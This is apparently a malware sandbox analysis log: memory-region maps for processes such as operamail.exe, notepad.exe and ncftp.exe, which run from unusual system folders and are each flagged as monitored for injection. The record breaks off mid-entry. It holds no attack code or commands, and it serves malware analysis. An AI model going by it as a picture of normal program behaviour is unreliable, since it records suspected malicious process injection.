mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2205 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2206 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2207 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2208 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2209 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2210 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2211 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2212 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2213 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2214 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2215 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2216 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2217 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2218 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2219 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2220 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2221 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2222 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2223 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 2225 start_va = 0x2070000 end_va = 0x21a2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002070000" filename = "" Thread: id = 119 os_tid = 0x1160 Process: id = "21" image_name = "operamail.exe" filename = "c:\\program files\\msbuild\\operamail.exe" page_root = "0x5f909000" os_pid = "0x116c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files\\MSBuild\\operamail.exe\" " cur_dir = "C:\\Program Files\\MSBuild\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2226 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2227 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2228 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2229 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2230 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2231 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2232 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2233 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2234 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2235 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2236 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2237 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2238 start_va = 0x4b0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 2239 start_va = 0x4c0000 end_va = 0x57dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2240 start_va = 0x690000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2241 start_va = 0x790000 end_va = 0x917fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 2242 start_va = 0x970000 end_va = 0x986fff monitored = 0 entry_point = 0x9714a1 region_type = mapped_file name = "operamail.exe" filename = "\\Program Files\\MSBuild\\operamail.exe" (normalized: "c:\\program files\\msbuild\\operamail.exe") Region: id = 2243 start_va = 0x990000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 2244 start_va = 0xb20000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 2245 start_va = 0x1f20000 end_va = 0x1fdbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f20000" filename = "" Region: id = 2246 start_va = 0x2070000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 2247 start_va = 0x2090000 end_va = 0x209ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002090000" filename = "" Region: id = 2248 start_va = 0x20a0000 end_va = 0x2a63fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 2249 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2250 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2251 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2252 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2253 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2254 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2255 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2256 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2257 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2258 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2259 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2260 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2261 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2262 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2263 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2264 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2265 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2266 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2267 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2268 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2269 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2270 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2271 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2272 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2273 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2274 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 2277 start_va = 0x2a70000 end_va = 0x2c03fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a70000" filename = "" Thread: id = 120 os_tid = 0x1170 Process: id = "22" image_name = "notepad.exe" filename = "c:\\program files (x86)\\windows portable devices\\notepad.exe" page_root = "0x5d513000" os_pid = "0x1174" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files (x86)\\Windows Portable Devices\\notepad.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Portable Devices\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2278 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2279 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2280 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2281 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2282 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2283 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2284 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2285 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2286 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2287 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2288 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2289 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2290 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 2291 start_va = 0x480000 end_va = 0x53dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2292 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2293 start_va = 0x5e0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 2294 start_va = 0x7e0000 end_va = 0x89bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 2295 start_va = 0x950000 end_va = 0x966fff monitored = 0 entry_point = 0x9514a1 region_type = mapped_file name = "notepad.exe" filename = "\\Program Files (x86)\\Windows Portable Devices\\notepad.exe" (normalized: "c:\\program files (x86)\\windows portable devices\\notepad.exe") Region: id = 2296 start_va = 0x970000 end_va = 0xaf7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 2297 start_va = 0xb00000 end_va = 0xc80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b00000" filename = "" Region: id = 2298 start_va = 0xc90000 end_va = 0x208ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c90000" filename = "" Region: id = 2299 start_va = 0x2250000 end_va = 0x225ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002250000" filename = "" Region: id = 2300 start_va = 0x2260000 end_va = 0x2c23fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002260000" filename = "" Region: id = 2301 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2302 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2303 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2304 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2305 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2306 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2307 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2308 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2309 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2310 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2311 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2312 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2313 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2314 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2315 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2316 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2317 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2318 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2319 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2320 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2321 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2322 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2323 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2324 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2325 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2326 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 2328 start_va = 0x2090000 end_va = 0x2192fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002090000" filename = "" Thread: id = 121 os_tid = 0x1178 Process: id = "23" image_name = "ncftp.exe" filename = "c:\\program files (x86)\\microsoft.net\\ncftp.exe" page_root = "0x5ca1d000" os_pid = "0x1184" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files (x86)\\Microsoft.NET\\ncftp.exe\" " cur_dir = "C:\\Program Files (x86)\\Microsoft.NET\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2329 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2330 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2331 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2332 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2333 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2334 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2335 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2336 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2337 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2338 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2339 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2340 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2341 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type 